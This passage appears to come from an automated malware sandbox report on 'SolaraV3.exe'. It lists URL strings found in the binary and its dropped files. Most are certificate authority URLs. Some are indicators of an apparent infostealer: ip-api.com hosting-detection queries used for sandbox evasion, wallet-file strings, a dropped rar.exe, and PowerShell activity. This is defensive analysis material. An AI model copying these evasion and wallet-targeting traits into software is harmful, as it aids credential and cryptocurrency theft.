00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SolaraV3.exe, 00000002.00000003.2036193521.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SolaraV3.exe, 00000002.00000002.2039145947.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039829113.000001FC2536E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035293287.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039554025.000001FC25361000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035172460.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2034874254.000001FC25360000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1743305378.000001FC252ED000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035050176.000001FC2536A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036060899.000001FC25325000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1794892126.00000267C15D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SolaraV3.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: SolaraV3.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SolaraV3.exe, 00000001.00000002.2058209847.000001EA23108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.j$
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SH
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _socket.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: SolaraV3.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: SolaraV3.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: SolaraV3.exe, 00000002.00000002.2038113836.000001FC24F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000001A.00000003.1634045934.000001407C750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC253DF000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC253E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr
Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.ve
Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veANIFE~1JSO
Source: SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veW
Source: SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veWALLET~2.JS
Source: powershell.exe, 0000000E.00000002.1785679390.00000267B9182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E80DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F6919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
